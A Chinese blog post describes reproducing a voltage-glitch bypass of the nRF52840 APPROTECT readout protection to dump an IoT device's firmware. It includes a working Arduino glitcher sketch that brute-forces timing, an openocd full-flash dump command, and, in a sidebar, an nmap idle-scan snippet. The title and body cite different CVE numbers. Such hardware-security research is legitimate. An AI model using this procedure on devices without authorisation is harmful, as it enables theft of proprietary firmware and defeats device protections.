绕过APPROTECT提取nRF52840固件(CVE-2020-27211复现)

最新推荐文章于 2023-08-18 17:22:36 发布
最新推荐文章于 2023-08-18 17:22:36 发布
阅读量4.5k 收藏 16
点赞数 6
分类专栏: 笔记 文章标签: nRF52840 故障注入 电压毛刺攻击 固件提取 硬件安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33917045/article/details/120580025
版权

之前帮忙逆向一个使用nRF52840做主控的物联网设备,在尝试使用J-link读取固件的时候发现芯片加了APPROTECT,但最后成果绕过,特此记录。
在nRF51系列中,固件使用RBPCONF保护,RBP仅仅禁止调试器读取内存,而调试器仍可操作寄存器,因此攻击者仍可在指令中撞到LDR指令(功能是将某寄存器所存地址处的数据加载到另一个寄存器中),并不断更改通用寄存器和PC寄存器的值来读取SRAM和FLASH中的数据。
不同于RBPCONF,APPROTECT直接用硬件切断了调试器与内核间的通信,因此不能再故技重施。在这里插入图片描述

漏洞原理

通过搜索发现nRF52系列芯片存在CVE-2021-29415漏洞,可在上电初期对芯片进行电压毛刺故障注入,从而绕过APPROTECT(详见https://limitedresults.com/2020/06/nrf52-debug-resurrection-approtect-bypass/)。并且由于AirTag也使用了nRF52系列的芯片,国外存在大量相关的绕过资料,甚至有人写了一个使用ESP32,通过web界面一键提取固件的程序
因此本文主要侧重逆向实战,即在无原理图的PCB上复现该漏洞。
该漏洞故障注入的核心操作是在芯片上电复位(其它复位手段不会复位APPROTECT)后的很短一段时间内对芯片内部1.1V稳压器的外置去耦电容DEC1和GND直接进行一次极快的短接。
在这里插入图片描述

注入点确定

根据上述资料,使用示波器观察DEC1处电压波形(下图黄色波形),在芯片上电(下图蓝色波形)大约1s后,DEC1处电压会有一个100mv以上的下降,而注入点正是这个下降沿。
在这里插入图片描述
通过对比数据手册中的参考原理图和实际PCB,确定出故障注入点:下图C5右侧焊点(左侧测得是GND)
在这里插入图片描述

电压毛刺注入电路实现

由于注入时机在每次芯片上电后,因此需要需要设计一个既能快速切换芯片通断电和注入点与GND之间连接的电路。考虑到故障注入对时机的要求严格,且该PCB上3v3的负载较大,不能使用单片机的IO之间供电,最初计划使用PMOS控制芯片供电,使用NMOS控制电压毛刺。
在这里插入图片描述
但实际发现PMOS导通后的压降较大,所以干脆把PMOS换成了继电器。但继电器的每次吸合时间的稳定性较差,导致注入毛刺的时机不稳定,降低了复现的成功率。单片机使用了最简单的Arduino UNO,理论上只要支持微妙级延迟的单片机都可以。

MCU代码

#define LED 13
#define GLITCHER 10
#define NRF_POWER 9
void setup() {
  Serial.begin (9600);
  pinMode(LED,OUTPUT);
  pinMode(4,INPUT_PULLUP);
  pinMode(GLITCHER,OUTPUT);
  pinMode(NRF_POWER,OUTPUT);
  digitalWrite(GLITCHER,LOW);
}
//根据示波器显示进行调整
uint32_t delay_time = 1000;
uint32_t width_time = 6;

void loop() {
  if(Serial.available())
  {
    if(Serial.read() =='g')
    {
      // Serial.println(delay_time);
      digitalWrite(LED,HIGH);
      //开始断电
      digitalWrite(NRF_POWER,HIGH);
      delay(1000);
      digitalWrite(LED,LOW);
      //开始供电
      digitalWrite(NRF_POWER,LOW);
      delay(13);
      delayMicroseconds(delay_time);
      //产生毛刺
      digitalWrite(GLITCHER,HIGH);
      delayMicroseconds(width_time);
      digitalWrite(GLITCHER,LOW);
      width_time++;
      //暴力测试
      if(width_time >16)
      {
        width_time = 6;
        delay_time += 3;
      }
    }
  }
}

成功效果

在暴力测试毛刺注入的同时使用示波器观察DEC1脚的电压变化,当注入成功时,DEC1处的电压不再下降:在这里插入图片描述
此时使用openocd通过j-link ob连接芯片即可正常连接并读取固件

openocd -s /usr/local/share/openocd/scripts -f ./interface/jlink.cfg -c "transport select swd" -f
./target/nrf52.cfg -c "init;dump_image nrf52_dumped.bin 0x0 0x100000"

也可通过编写脚本,在每次注入后都尝试连接芯片读取固件。

new_kali_notes
关注
  • 6
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
APProtect 基于虚拟机的一机一码加壳加网络验证软件
11-02
APProtect是一款专门给EXE程序加密加授权加验证的软件,加密强度很高。
nRF52840开发指南-上册.pdf.docx
02-24
艾克姆科技
nRF52832禁用APPROTECT
kevinlovejia的专栏
03-23 958
如果选择“Yes”就会擦除内部flash的大部分内容,选择否则无法下载。这是在调试nRF82532时经常遇到的提示,这是芯片对外部访问的一种保护手段,现在告诉大家如何禁用这种提示,当然在你的程序调试完毕,准备发布时把这个功能可以继续开启。经过3个步骤的操作,给nRF52832断电复位,就不会再提示需要CTRL-AP indicate that the device is secured…进行操作,发现没法下载了,断电重启电路板和仿真器都不管用,可以在cmd下输入下面这行命令就可以继续下载了,提取安装好。
如何修复或者更新nRF52840 Dongle固件
Wireless Farmer的博客
02-01 6697
前言 近期,nRF Connect的版本升级到了v2.5.0,导致一些发货出去的nRF52840 Dongle根据nRF Connect的指引升级Bootloader时,出现无法升级的情况。最初,我们在遇到这个问题时也很纳闷,为什么在v2.4.0版本升级没有问题,怎么到了v2.5.0反而出问题了呢。后来,我们在官方的Release Note中看到了如下信息: Updated connectivi...
CVE漏洞挖掘学习记录
caiyuu的博客
11-10 4210
CVE漏洞挖掘学习笔记空闲扫描利用空闲扫描进行信息收集工作原理Nmap探测waf的脚本waf介绍探测waf工作原理 空闲扫描 空闲扫描时一种允许端口完全欺骗的扫描方式。使得攻击者不使用自己的IP向目标主机发送数据包,利用具有可预测的IP ID序列号来掩盖端口扫描的原始IP(隐藏IP)。如利用不活跃的“僵尸主机“反弹给”攻击者一个旁通信道。 利用空闲扫描进行信息收集 前提准备,需要一个僵尸主机; nmap -p80 --script ipidseq <your ip>/24 <全网段&
error: #65: expected a “;“static inline void nrf52_handle_approtect(void) keil5
m0_73366359的博客
07-27 124
补充一个解决办法
NRF52840协议栈固件-softdevice.hex文件
02-05
NRF52840协议栈固件,如"softdevice.hex"文件,是挪威Nordic Semiconductor公司为他们的NRF52840无线微控制器设计的核心软件组件。这个微控制器广泛应用于低功耗蓝牙(Bluetooth Low Energy,BLE)、Thread、Zigbee...
J-link烧录固件Labview代码,烧录nRF52840固件实例,J-link烧录Command
最新发布
04-24
J-link烧录固件Labview代码,烧录nRF52840固件实例,J-link烧录Command; 需要设置以下内容 (J-Link的的安装位置,每个电脑可能安装的路径不一致; J-Link的SN需要输入:可以同时执行多个J-Link设备烧录多台样机;...
nRF52840开发指南-下册.pdf
10-21
nRF52840开发指南-下册》是一份详细阐述Nordic nRF52840 soc芯片的开发教程,该芯片广泛应用于蓝牙低功耗(BLE)和802.15.4无线通信。这份文档由艾克姆科技飞宇团队编写,旨在帮助开发者掌握基于nRF52840的BLE应用...
sparkfun-nrf52840-arduino-board-def-v1.4.zip
09-12
《Sparkfun NRF52840 Arduino Board Definition v1.4 深度解析》 在探索物联网(IoT)和嵌入式系统的世界时,我们经常会遇到各种微控制器和开发板。Sparkfun的NRF52840 Arduino Board是其中一款功能强大的设备,而`...
uECC.h和micro-ecc-lib-nrf52.lib
12-13
Nordic 52832 dfu 升级 keil编译 缺少的uECC.h和micro_ecc_lib_nrf52.lib相关文件。将micro-ecc拷入nRF5_SDK_14.2.0_17b948a\external\micro-ecc,然后将micro_ecc_lib_nrf52.lib复制到nRF5_SDK_14.2.0_17b948a\external\micro-ecc\nrf52hf_keil\armgcc和nRF5_SDK_14.2.0_17b948a\external\micro-ecc\nrf52nf_keil\armgcc文件下即可。重新编译文件nRF5_SDK_14.2.0_17b948a\examples\dfu\bootloader_secure_serial\pca10040\s132\arm5_no_packs。
nRF keil工程错误相关
qq_37258637的博客
01-15 517
若因__use_no_semihosting编译不过,就要检查有无错误调用,多半在SEGGER_RTT_Syscalls_KELL.c中。若用到此文件则在sdk_config.h中多加一个宏定义 // <q> RETARGET_ENABLED - retarget - Retargeting stdio functions #ifndef RETARGET_ENABLED #de...
52832 SDK 循序渐进(一)1.点灯/ 2. 解决P9使能 / 3. RTT调试打印
pocean2012的博客
01-20 638
一 . 从blink例程开始 工程文件目录:F:\52832\nRF5_SDK_15.2.0_9412b96-1\examples\peripheral\blinky\pca10040\s132\arm5_no_packs 代码不复杂: 我们开发板硬件连接: 另外定义个板载资源文件dev.h,和pca10040.h文件放一起,然后修改boards.h,增加 #elif defined(...
nRF52840 制作BLE Sniffer(蓝牙嗅探器)
chenmosheyan的博客
08-18 1257
打开Programmer,左上角点击SELECT DEVICE,选择JLINK,连接成功后会识别到nRF52840芯片,添加open_bootloader_usb_mbr_pca10059_debug.hex文件,点击。2.1 解压nRF Sniffer for Bluetooth LE到任一文件夹(例如:D盘下的nrf_sniffer_for_bluetooth_le文件夹),在nrf_sniffer_for_bluetooth_le\extcap文件夹中打开一个命令窗口。
nRF52832的UICR
qinrenzhi的博客
04-02 1988
nRF52832的UICR UICR(User information configuration registers)是保存用户特殊设置的非易失存储寄存器(NVM:Non-volatile memory),UICR与Flash的不同的是只有通过全片擦除后才能重新写入,不能单独擦除。 UICR寄存器组: NRFFW[14:0]:为Nordic固件保留,与DFU的设计有关。 NRF...
NRF52 开启读保护
ching的专栏
02-02 1843
读保护作用 防止第三方使用调试接口读取flash中的内容。 开启读保护的三种方式 在代码中开启读保护 在APPROTECT的低8位写0表示开启读保护。 在工程中的任意源文件中加入如下代码。 const uint32_t UICR_APPROTECT __attribute__((at(0x10001208))) __attribute__((used)) = 0xFFFFFF00; 使用批处理烧录 在烧录hex文件之后执行命令:nrfjprog --rbp 使用nRFgo Studio 在烧录
第一次玩nRF52840 DK 板子到成功点灯的一次经历
qq_43565894的博客
05-03 1588
nRF 52840的初学之路
nrf52840烧录配置(协议栈+APP
博雅电子
11-14 2652
在MDK工程中烧录NRF52832/NRF52840 的蓝牙协议栈和APP工程。不烧录bootloader
nrf52840开发指南-下册.pdf
05-09
nrf52840开发指南-下册.pdf是一本非常有价值的技术书籍,对于想要了解和学习nrf52840芯片的人来说是一本必读的书籍。 本书主要介绍了nrf52840芯片的各种功能和特性,包括如何使用软件开发工具和硬件开发工具进行开发,如何设计和实现各种系统及其应用等。本书涵盖了从初学者到高级开发者所需要的内容,包括基础知识、应用案例、注意事项等。 值得一提的是,本书是由nrf52840开发团队和各大开发者共同撰写的,因此详细而且深入,很多内容都非常实用。比如,在本书中,我们可以了解到nrf52840芯片的特殊功能,如BLE(蓝牙低功耗)协议、ANT+协议、IEEE 802.15.4等,这些功能足以满足现代智能设备的开发和应用需求。 同时,本书也介绍了nrf52840开发过程中常见的问题及其解决方案,这些问题包括系统调试、电源管理、时钟管理和代码优化等。对于想要将nrf52840芯片应用于实际项目中的开发者来说,这些内容都非常有用。 总的来说,nrf52840开发指南-下册.pdf是一本非常优秀的技术书籍,涵盖了对nrf52840开发过程中需要掌握的技能和知识,对于nrf52840芯片的研究和开发具有较大的参考价值。对于全面掌握nrf52840芯片的开发者来说,是一本必不可少的参考工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值